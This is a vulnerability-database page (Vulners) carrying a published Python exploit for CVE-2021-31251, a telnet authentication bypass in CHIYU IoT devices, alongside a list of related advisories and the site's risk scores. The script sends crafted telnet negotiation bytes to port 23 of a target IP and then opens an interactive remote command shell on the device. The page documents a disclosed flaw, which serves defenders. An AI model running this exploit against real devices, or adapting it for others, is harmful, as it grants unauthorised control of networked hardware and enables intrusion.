Vulners
Lucene search
CHIYU IoT Devices - 'Telnet' Authentication Bypass
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | CHIYU IoT Devices - (Telnet) Authentication Bypass Exploit | 3 Jun 202100:00 | – | zdt |
 | CVE-2021-31251 | 3 Jun 202111:57 | – | circl |
 | CHYUI 授权问题漏洞 | 3 Jun 202100:00 | – | cnnvd |
 | CVE-2021-31251 | 4 Jun 202120:25 | – | cve |
 | CVE-2021-31251 | 4 Jun 202120:25 | – | cvelist |
 | EUVD-2021-18163 | 7 Oct 202500:30 | – | euvd |
 | CVE-2021-31251 | 4 Jun 202121:15 | – | nvd |
 | CHIYU IoT Telnet Authentication Bypass | 3 Jun 202100:00 | – | packetstorm |
 | Authentication flaw | 4 Jun 202121:15 | – | prion |
 | CHIYU IoT services Authentication bypass in telnet server(CVE-2021-31251) | 7 Jun 202100:00 | – | seebug |
10
# Exploit Title: CHIYU IoT Devices - 'Telnet' Authentication Bypass
# Date: 01/06/2021
# Exploit Author: sirpedrotavares
# Vendor Homepage: https://www.chiyu-tech.com/msg/msg88.html
# Software Link: https://www.chiyu-tech.com/category-hardware.html
# Version: BF-430, BF-431, BF-450M, and SEMAC - all firmware versions < June 2021
# Tested on: BF-430, BF-431, BF-450M, and SEMAC
# CVE: CVE-2021-31251
# Publication: https://seguranca-informatica.pt/dancing-in-the-iot-chiyu-devices-vulnerable-to-remote-attacks
"""
Description: Several IoT devices from the CHIYU Technology firm are
vulnerable to a flaw that permits bypassing the telnet authentication
process due to an overflow during the negotiation of the telnet protocol.
Telnet authentication is bypassed by supplying a specially malformed
request, and an attacker may force the remote telnet server to believe that
the user has already authenticated. Several models are vulnerable,
including BF-430, BF-431, BF-450M, and SEMAC with the most recent firmware
versions.
CVE ID: CVE-2021-31251
CVSS: Critical - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
URL: https://gitbook.seguranca-informatica.pt/cve-and-exploits/cves/chiyu-iot-devices#cve-2021-31251
"""
#!/usr/bin/env python3
# usage: python3 exploit.py IP
import socket
import time
import sys
HOST = sys.argv[1]
PORT = 23
socket.setdefaulttimeout(10)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
connect = s.connect_ex((HOST, PORT))
try:
print("[+] Try to connect...\n")
time.sleep(1)
s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
s.recv(1024).strip()
s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
s.recv(1024).strip()
s.send(b"\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18")
result = s.recv(1024).strip()
if result != b'\xff\xfe\x01':
s.send(b"\x09")
result = s.recv(1024).strip()
if connect == 0 and "sername" not in str(result):
if b"\xff\xfe\x01" == result:
print("Connected! ;)\ntype: \"help\"\n\n")
while 1:
cmd = input("(CHIYU pwnShell:) $ ")
body = cmd+"\n"
s.send(body.encode('utf-8', 'ignore'))
result = s.recv(1024).decode('utf8', 'ignore')
if not len(result):
print("[+] CHIYU device not available, try
again ... (terminating)")
s.close()
break
print(result.strip('CMD>'))
b = "\n"
s.send(b.encode('utf-8', 'ignore'))
result = s.recv(1024).decode()
print(result.strip('CMD>'))
except KeyboardInterrupt:
print("\n[+] ^C Received, closing connection")
s.close()
except EOFError:
print("\n[+] ^D Received, closing connection")
s.close()
except socket.error:
print("[+] Unable to connect to CHIYU device.")Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Jun 2021 00:00Current
9.7High risk
Vulners AI Score9.7
CVSS 27.5
CVSS 3.19.8
EPSS0.27519